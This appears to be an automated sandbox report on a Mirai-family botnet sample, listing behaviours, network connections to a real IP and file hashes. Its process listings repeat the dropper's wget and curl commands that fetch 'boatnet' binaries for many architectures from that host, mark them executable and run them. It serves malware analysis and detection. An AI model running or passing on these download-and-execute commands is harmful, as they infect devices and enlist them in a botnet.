| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/677/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/759/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/782/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/794/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/805/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/813/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/668/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/671/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/824/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/687/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/750/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/757/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/818/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/887/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/717/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/855/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/709/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/826/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/701/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/702/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/784/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/808/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/760/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/827/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/851/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/869/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/893/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/706/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/874/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/892/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/806/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/789/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/817/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/898/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/678/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/875/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/904/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/414/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/823/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/881/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/708/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/711/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/811/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
memory/747-1-0x00400000-0x00451a58-memory.dmp
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 04:14
Reported
2024-11-09 04:17
Platform
debian9-mipsel-20240418-en
Max time kernel
149s
Max time network
139s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/896/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/659/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/666/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/712/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/882/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/665/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/686/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/700/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/706/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/842/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/411/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/870/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/663/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/708/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/705/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/879/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/883/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/897/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
